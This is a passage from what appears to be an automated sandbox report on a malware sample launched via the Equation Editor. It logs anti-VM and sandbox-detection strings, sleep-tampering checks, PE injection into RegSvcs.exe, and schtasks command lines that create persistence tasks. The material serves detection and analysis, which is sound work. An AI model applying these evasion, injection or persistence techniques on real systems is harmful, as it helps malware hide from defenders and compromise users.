        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Yara detected AntiVM3Show sources
        Source: Yara matchFile source: 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: plugmangd5693.exe PID: 1580, type: MEMORYSTR
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
        Source: plugmangd5693.exe, 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
        Source: plugmangd5693.exe, 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
        Found evasive API chain (trying to detect sleep duration tampering with parallel thread)Show sources
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeFunction Chain: threadCreated,threadResumed,handleClosed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2248Thread sleep time: -240000s >= -30000s
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2248Thread sleep time: -60000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe TID: 2684Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe TID: 2684Thread sleep time: -240000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe TID: 2684Thread sleep time: -780000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe TID: 2816Thread sleep time: -36874s >= -30000s
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe TID: 2668Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\taskeng.exe TID: 2608Thread sleep time: -60000s >= -30000s
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 1848Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2588Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeThread delayed: delay time: 240000
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeWindow / User API: threadDelayed 517
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_0076410E sldt word ptr [eax]
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess information queried: ProcessInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_004D11C2 GetSystemInfo,
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeThread delayed: delay time: 240000
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeThread delayed: delay time: 30000
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeThread delayed: delay time: 36874
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
        Source: plugmangd5693.exe, 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmpBinary or memory string: vmware
        Source: plugmangd5693.exe, 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: plugmangd5693.exe, 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
        Source: plugmangd5693.exe, 00000004.00000002.424681352.000000000029C000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
        Source: plugmangd5693.exe, 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmpBinary or memory string: VMWARE
        Source: plugmangd5693.exe, 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: plugmangd5693.exe, 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
        Source: plugmangd5693.exe, 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
        Source: plugmangd5693.exe, 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Writes to foreign memory regionsShow sources
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 420000
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 422000
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 7EFDE008
        Allocates memory in foreign processesShow sources
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 protect: page execute and read and write
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\plugmangd5693.exe C:\Users\user\AppData\Roaming\plugmangd5693.exe
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\RWbqWnnjDWI' /XML 'C:\Users\user\AppData\Local\Temp\tmp3709.tmp'
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3FEE.tmp'
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp2DF5.tmp'
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe 0
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
        Source: RegSvcs.exe, 00000008.00000002.672442525.0000000002889000.00000004.00000001.sdmpBinary or memory string: Program ManagerH
        Source: RegSvcs.exe, 00000008.00000002.672012234.0000000001130000.00000002.00020000.sdmp, taskeng.exe, 0000000C.00000002.671390743.00000000006F0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
        Source: RegSvcs.exe, 00000008.00000002.672012234.0000000001130000.00000002.00020000.sdmp, taskeng.exe, 0000000C.00000002.671390743.00000000006F0000.00000002.00020000.sdmpBinary or memory string: !Progman
        Source: RegSvcs.exe, 00000008.00000002.671744859.000000000083A000.00000004.00000020.sdmpBinary or memory string: Program Managerknown.
